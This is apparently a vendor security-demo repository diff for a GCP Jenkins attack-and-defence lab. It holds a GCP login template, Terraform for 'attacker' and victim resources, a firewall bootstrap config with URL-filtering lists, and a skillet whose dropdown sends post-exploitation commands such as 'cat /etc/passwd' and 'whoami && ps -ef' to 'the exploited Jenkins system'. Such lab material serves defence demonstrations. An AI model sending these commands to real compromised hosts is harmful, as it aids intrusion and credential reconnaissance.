diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
new file mode 100644
index 00000000..02637f31
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
@@ -0,0 +1,25 @@
+To authenticate to GCP, please run the following command:
+
+Make sure you have a .config directory in your home directory.
+On either OSX or Windows, if the .config directory does not exist in your home directory,
+run the following command from a terminal or PowerShell window in your home directory:
+
+mkdir .config
+
+
+Mac OSX - from a terminal window:
+docker run -ti --rm -v $HOME/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+Windows - from a PowerShell window:
+docker run -ti -p 8888:80 --rm -v /c/Users/%USERNAME%/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+This command will display a link that you should copy into your browser. This will then display a verification
+code that you use to authenticate this machine.
+
+
+For more information, see the Google Cloud SDK guide here:
+
+https://cloud.google.com/sdk/gcloud/
+
+And for more information on authenticating, see here:
+https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
new file mode 100644
index 00000000..5c843d7e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
@@ -0,0 +1,45 @@
+name: gcp_jenkins_send
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 3 Send Command
+
+description: >
+ This skillet allows you to interact with and send commands to the exploited Jenkins system.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: cli
+ description: Command to Send
+ default: cat /etc/passwd
+ type_hint: dropdown
+ dd_list:
+ - key: "whoami & ps -ef--- Show who you are logged in as and running processes"
+ value: "whoami && ps -ef"
+ - key: "cat /etc/passwd--- show the contents of the passwd file"
+ value: "cat /etc/passwd"
+ - key: "netstat -a---- showing active tcp sessions"
+ value: "netstat -a"
+ - key: "netstat -tn 2>/dev/null |grep :443--- Show active tcp session on port 443"
+ value: "netstat -tn 2>/dev/null |grep :443"
+ - name: manual_cli
+ description: Manual Command to Send
+ default: ''
+ type_hint: text
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: payload
+ file: ../../send_command.py
diff --git a/gcp/Jenkins_proj-master/README.md b/gcp/Jenkins_proj-master/README.md
new file mode 100644
index 00000000..d76662b1
--- /dev/null
+++ b/gcp/Jenkins_proj-master/README.md
@@ -0,0 +1,2 @@
+Jenkins_proj
+Jenkins Project
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf
new file mode 100644
index 00000000..d5efe764
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf
@@ -0,0 +1,42 @@
+resource "google_compute_instance" "attacker" {
+ name = "attacker"
+ project = "${google_project.attacker_project.id}"
+ zone = "${var.GCP_Zone}"
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+ depends_on = [
+ "google_storage_bucket_object.config_file_attacker",
+ "google_project_service.attacker_project"
+ ]
+ metadata {
+ startup-script-url = "gs://${google_storage_bucket.attacker_bucket.name}/initialize_attacker.sh"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ "https://www.googleapis.com/auth/compute.readonly",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.attacker_subnet.self_link}"
+ network_ip = "${var.Attacker_IP}"
+ access_config = {}
+ }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf
new file mode 100644
index 00000000..5221c2dc
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf
@@ -0,0 +1,47 @@
+resource "google_storage_bucket" "bootstrap_bucket" {
+ name = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+ storage_class = "REGIONAL"
+ location = "${var.GCP_Region}"
+ project = "${google_project.victim_project.id}"
+}
+resource "google_storage_bucket" "attacker_bucket" {
+ name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+ storage_class = "REGIONAL"
+ location = "${var.GCP_Region}"
+ project = "${google_project.attacker_project.id}"
+}
+resource "google_storage_bucket_object" "config_file_webserver" {
+ name = "initialize_webserver.sh"
+ source = "scripts/initialize_webserver.sh"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "config_file_attacker" {
+ name = "initialize_attacker.sh"
+ source = "scripts/initialize_attacker.sh"
+ bucket = "${google_storage_bucket.attacker_bucket.name}"
+}
+resource "google_storage_bucket_object" "bootstrap" {
+ name = "config/bootstrap.xml"
+ source = "bootstrap/bootstrap.xml"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "init_cfg" {
+ name = "config/init-cfg.txt"
+ source = "bootstrap/init-cfg.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "content" {
+ name = "content/null.txt"
+ source = "bootstrap/null.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "software" {
+ name = "software/null.txt"
+ source = "bootstrap/null.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "license" {
+ name = "license/null.txt"
+ source = "bootstrap/null.txt"
+ bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
new file mode 100644
index 00000000..83b66601
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
@@ -0,0 +1,2656 @@
+
+
+
+
+
+ $1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK.
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+ Panorama
+ 1.2.3.4
+ test@yourdomain.com
+ test@yourdomain.com
+
+
+
+
+
+
+
+
+ UDP
+ 514
+ BSD
+ 1.2.3.4
+ LOG_USER
+
+
+
+
+
+
+
+
+ Sample_Email_Profile
+
+ (severity eq critical)
+ Email Critical System Logs
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+
+ traffic
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ threat
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+ Sample_Email_Profile
+
+ Email Malicious Wildfire Verdicts
+ wildfire
+ (verdict eq malicious)
+ no
+
+
+
+ Sample_Email_Profile
+
+ Email Phishing Wildfire Verdicts
+ wildfire
+ (verdict eq phishing)
+ no
+
+
+ wildfire
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ url
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ data
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ gtp
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ tunnel
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+ auth
+ All Logs
+ no
+
+ Sample_Syslog_Profile
+
+
+
+
+
+
+
+
+ last-7-calendar-days
+ 500
+ 50
+
+ daily
+ (app neq smtp) and (category neq benign)
+ Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email.
+
+
+ repeatcnt
+
+ filedigest
+ container-of-app
+ app
+ category
+ filetype
+ rule
+
+
+ repeatcnt
+
+
+
+
+
+ last-30-calendar-days
+ 500
+ 10
+
+ Wildfire verdicts SMTP
+ daily
+ (app eq smtp) and (category neq benign)
+ Links sent from emails found to be malicious.
+
+
+ repeatcnt
+
+ filedigest
+ container-of-app
+ app
+ category
+ filetype
+ rule
+ subject
+ sender
+ recipient
+ misc
+
+
+
+
+
+ last-30-calendar-days
+ 500
+ 50
+
+ Clients sinkholed
+ (rule eq 'DNS Sinkhole Block')
+ daily
+
+
+ repeatcnt
+ from
+
+ src
+ srcuser
+
+
+ repeatcnt
+
+
+
+
+
+
+
+
+
+ Clients sinkholed
+
+
+ Wildfire malicious verdicts
+
+
+ Wildfire verdicts SMTP
+
+
+ Hosts visit malicious sites
+
+
+ Host-visit malicious sites plus
+
+
+ Hosts visit questionable sites
+
+
+ Host-visit quest sites plus
+
+
+ yes
+
+
+ Possible Compromise
+
+
+
+
+
+
+ Possible Compromise
+
+
+
+ Sample_Email_Profile
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+ 10000
+ 10000
+ 40000
+
+ no
+
+
+
+
+
+
+
+ 2
+ 100
+
+
+
+
+
+ 10
+ 100
+
+
+
+
+
+ 2
+ 100
+
+
+ yes
+ yes
+ yes
+ no
+ global
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ WebFW1
+ UTC
+ updates.paloaltonetworks.com
+ yes
+
+
+ 8.8.8.8
+ 10.0.0.2
+
+
+ Gold 1.0 - PANOS 8.0
+
+ yes
+ yes
+
+
+
+
+
+
+
+
+
+
+ yes
+ no
+ no
+ no
+
+
+
+
+
+
+ 00:00
+ download-and-install
+
+ 48
+
+
+
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+
+
+
+
+ 3
+ download-and-install
+
+
+
+
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ no
+ no
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==
+ 8.8.8.8
+ 8.8.4.4
+
+
+
+ yes
+ yes
+
+
+
+
+ 10
+
+
+ 30
+
+
+ 1000
+
+
+ 2000
+
+
+ 5
+
+
+ 5
+
+
+ 1
+
+
+ 10
+
+
+ 2
+
+
+ yes
+ yes
+
+
+ yes
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ELB-HealthChecker/2.0
+ http-req-headers
+
+
+
+
+
+
+ session
+ no
+
+
+ infrastructure
+ networking
+ browser-based
+ 1
+
+
+
+
+ tcp/80
+
+
+
+
+
+
+
+
+
+
+
+
+ GET
+
+
+ GoogleHC/
+ http-req-headers
+
+
+
+
+
+
+ session
+ no
+
+
+ ip-protocol
+ networking
+ client-server
+ 1
+
+
+
+
+
+
+
+
+
+
+
+ allow
+ no
+ yes
+
+
+ Inbound
+
+
+ default
+
+
+ deny
+ no
+ yes
+ default
+
+
+
+
+
+
+
+
+
+
+ financial-services
+ government
+ health-and-medicine
+ Custom-No-Decrypt
+
+
+ any
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+ Recommended_Decryption_Profile
+ no-decrypt
+ yes
+ This rule does not do Decryption. This rule is validating SSL Protocol Communications.
+
+
+
+ any
+
+
+ any
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+ Recommended_Decryption_Profile
+ no-decrypt
+ This rule does not do Decryption. This rule is validating SSL Protocol Communications.
+
+
+
+
+
+
+
+
+
+ Outbound to the Internet
+
+
+ Inbound from the Internet
+
+
+ Internal to Internal
+
+
+
+
+ 2600:5200::1
+
+
+ 10.0.1.10
+
+
+
+
+
+
+
+
+
+ http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt
+ IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html
+
+
+
+
+
+
+
+
+
+ http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt
+ IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ yes
+ yes
+ yes
+ yes
+ yes
+
+
+ yes
+ yes
+
+
+ no
+ no
+
+
+ yes
+ yes
+
+
+ tls1-2
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ dll
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ dll
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+ any
+
+
+ 7z
+ bat
+ chm
+ class
+ cpl
+ hlp
+ hta
+ jar
+ ocx
+ pif
+ scr
+ torrent
+ vbe
+ wsf
+
+ both
+ block
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ alert
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+ high
+ critical
+ medium
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+ high
+ critical
+ medium
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+ high
+ critical
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ low
+ informational
+ medium
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2600:5200::1
+
+ disable
+
+
+
+
+
+
+
+ any
+
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 72.5.65.111
+ 2600:5200::1
+
+ single-packet
+
+
+
+
+
+
+
+
+
+
+
+ extended-capture
+
+ pan-sinkhole-default-ip
+ ::1
+
+
+
+
+
+
+
+
+ any
+
+ any
+ any
+ single-packet
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ high
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ White-List
+
+
+ yes
+ yes
+ yes
+ block
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ White-List
+
+
+ command-and-control
+ hacking
+ malware
+ phishing
+ Black-List
+
+
+
+
+
+
+
+ medium
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+
+
+ block
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+
+
+
+
+
+
+
+ high
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+
+
+ yes
+ yes
+ yes
+ block
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ White-List
+
+
+ command-and-control
+ hacking
+ malware
+ phishing
+ Black-List
+
+
+
+
+
+
+
+ medium
+
+ White-List
+
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ Custom-No-Decrypt
+
+
+ block
+ yes
+ yes
+ yes
+ no
+
+ White-List
+
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ Custom-No-Decrypt
+
+
+
+
+
+
+
+ medium
+
+ Black-List
+ Custom-No-Decrypt
+ White-List
+
+
+ block
+ yes
+ yes
+ yes
+ no
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ Custom-No-Decrypt
+ White-List
+
+
+
+
+
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+ default
+ default
+
+
+ default
+ default
+
+
